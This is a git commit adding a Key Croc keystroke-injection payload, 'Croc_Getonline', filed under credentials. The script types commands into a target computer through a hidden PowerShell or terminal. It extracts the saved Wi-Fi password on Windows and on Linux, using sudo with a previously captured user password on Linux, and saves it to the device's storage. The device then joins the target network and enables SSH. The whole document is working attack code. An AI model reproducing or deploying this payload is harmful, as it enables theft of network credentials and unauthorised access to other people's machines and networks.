Create Croc_getonline.txt

Attempt to connect Keycroc automatically to target wifi access point
2023-03-12 09:05:43 +00:00 · 2023-03-12 09:05:43 +00:00 · 3a97587fa0
parent 2ac37fb87d
commit 3a97587fa0
1 changed files with 118 additions and 0 deletions
--- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
+++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
@ -0,0 +1,118 @@
+# Title:           Croc_Getonline
+# Description:     Attempt to connect Keycroc automatically to target wifi access point
+#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
+# Author:          spywill
+# Version:         3.5
+# Category:        Key Croc
+# Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro
+
+MATCH (getonline_W|getonline_R|getonline_L)
+
+CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
+for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
+
+wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
+
+if [ -f $wifi_pass ]; then
+	cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
+	rm -f $wifi_pass
+fi
+
+ATTACKMODE HID STORAGE
+Q DELAY 5000
+LED ATTACK
+
+case $LOOT in
+	getonline_W)
+		Q GUI r
+		Q DELAY 3000
+		Q STRING "powershell -NoP -NonI -W Hidden"
+		Q ENTER
+		Q DELAY 5000
+		Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
+		Q ENTER
+		Q DELAY 5000
+		Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+	getonline_R)
+		Q CONTROL-ALT-d
+		Q CONTROL-ALT-t
+		Q DELAY 2000
+		Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "umount \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+	getonline_L)
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+		else
+			PC_PW=LINUX
+		fi
+		Q CONTROL-ALT-d
+		Q ALT-t
+		Q DELAY 2000
+		Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "$PC_PW"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "sudo umount \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+esac
+
+ATTACKMODE HID
+sleep 3
+
+LED SETUP
+kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
+ifconfig wlan0 down
+
+if [ "$LOOT" = "getonline_W" ]; then
+	sed -i '0,/./s/^.//' $wifi_pass
+	sed -i 's/\r//g' $wifi_pass
+fi
+
+sed -i 's/\( \)*/\1/g' $wifi_pass
+sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
+sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
+wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
+ifconfig wlan0 up
+wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
+sleep 3
+systemctl restart ssh.service
+
+[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
+sleep 3
+LED OFF